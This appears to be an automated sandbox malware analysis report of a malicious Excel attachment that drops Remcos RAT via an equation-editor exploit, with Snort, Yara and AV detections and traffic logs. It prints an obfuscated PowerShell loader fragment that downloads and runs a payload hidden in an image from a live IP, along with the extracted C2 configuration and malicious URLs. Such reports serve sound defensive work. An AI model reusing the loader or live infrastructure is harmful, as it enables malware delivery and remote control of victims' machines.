YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 38 49 7F A9 A0 39 09 91 D3 B7 37 5B 7B 12 5B AA 0F 6B 82 BD 47 E2 0D 3B F0 DF 65 FE 07 40 70 17 F5 9D 66 56 AC B9 14 0A 32 0B C0 26 A2 F4 CE 68 AC 49 B4 8B 89 65 61 0F 6F 96 AD EE A1 D8 91 82 EA 21 D1 7E 8E D0 13 35 08 21 4B 7B 1A 3D 94 C3 B4 E9 97 E3 9B C0 13 DC 5C 63 1B DC 9A C3 CA F7 C7 7C 9F BE 0C 48 BE 1D 6A 3D C7 40 A7 C9 1A FB EE 4B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3332, TargetObject: HKEY_CURRENT_USER\Software\Rmc-Y7DJPP\exepath

Snort Signatures

ET TROJAN Windows executable base64 encoded - Source IP: 91.92.254.194 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:46.449686
SID:	2018856
Source Port:	80
Destination Port:	49175
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Malicious Base64 Encoded Payload In Image - Source IP: 91.92.254.14 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:42.221283
SID:	2049038
Source Port:	80
Destination Port:	49174
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 - Source IP: 172.232.56.138 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:47.671875
SID:	2020423
Source Port:	80
Destination Port:	49176
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 - Source IP: 172.232.56.138 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:47.671875
SID:	2020424
Source Port:	80
Destination Port:	49176
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Base64 Encoded MZ In Image - Source IP: 91.92.254.194 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:46.607522
SID:	2047750
Source Port:	80
Destination Port:	49175
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Malicious Base64 Encoded Payload In Image - Source IP: 91.92.254.194 - Destination IP: 192.168.2.22

Timestamp:	07/05/24-07:16:46.686651
SID:	2049038
Source Port:	80
Destination Port:	49175
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.92.254.194/imge/new-image_v.jpg

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "216.9.224.18:9943:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Y7DJPP", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: woi.gg	Virustotal: Detection: 11%	Perma Link
Source: 216.9.224.18	Virustotal: Detection: 18%	Perma Link
Source: http://172.232.56.138/99032/goodflowersandgoodreturn.gif	Virustotal: Detection: 8%	Perma Link
Source: http://woi.gg/1RxrR6	Virustotal: Detection: 9%	Perma Link
Source: http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc	Virustotal: Detection: 7%	Perma Link
Source: https://woi.gg/1RxrR6	Virustotal: Detection: 9%	Perma Link
Source: http://172.232.56.138/99032/WRESS.txt	Virustotal: Detection: 8%	Perma Link
Source: http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt	Virustotal: Detection: 21%	Perma Link
Source: http://woi.gg/	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: Swift tract-20240506_120.xls	ReversingLabs: Detection: 18%
Source: Swift tract-20240506_120.xls	Virustotal: Detection: 26%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\not\logs.dat, type: DROPPED

Machine Learning detection for sample

Source: Swift tract-20240506_120.xls

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

11_2_00433837

Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_0a7afee8-7

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.232.56.138 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Source: ~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp.4.dr	Stream path '_1781647351/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp.4.dr	Stream path '_1781647354/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004074FD _wcslen,CoGetObject,

11_2_004074FD

Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.11.106:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49171 version: TLS 1.2

Source:

Binary string: RunPE.pdb source: powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453623942.00000000002F0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044E879 FindFirstFileExA,	11_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040783C FindFirstFileW,FindNextFileW,	11_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407C97

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B2879 LoadLibraryW,	6_2_005B2879
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B2944 ShellExecuteW,ExitProcess,	6_2_005B2944
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B2916 URLDownloadToFileW,ShellExecuteW,ExitProcess,	6_2_005B2916
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B2969 ExitProcess,	6_2_005B2969
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B292F ShellExecuteW,ExitProcess,	6_2_005B292F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B27A8 ExitProcess,	6_2_005B27A8

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: woi.gg
Source: global traffic	DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.11.106:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.92.254.14:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.11.106:80
Source: global traffic	TCP traffic: 104.21.11.106:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.11.106:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.11.106:80
Source: global traffic	TCP traffic: 104.21.11.106:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.11.106:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.11.106:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.11.106:443
Source: global traffic	TCP traffic: 104.21.11.106:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
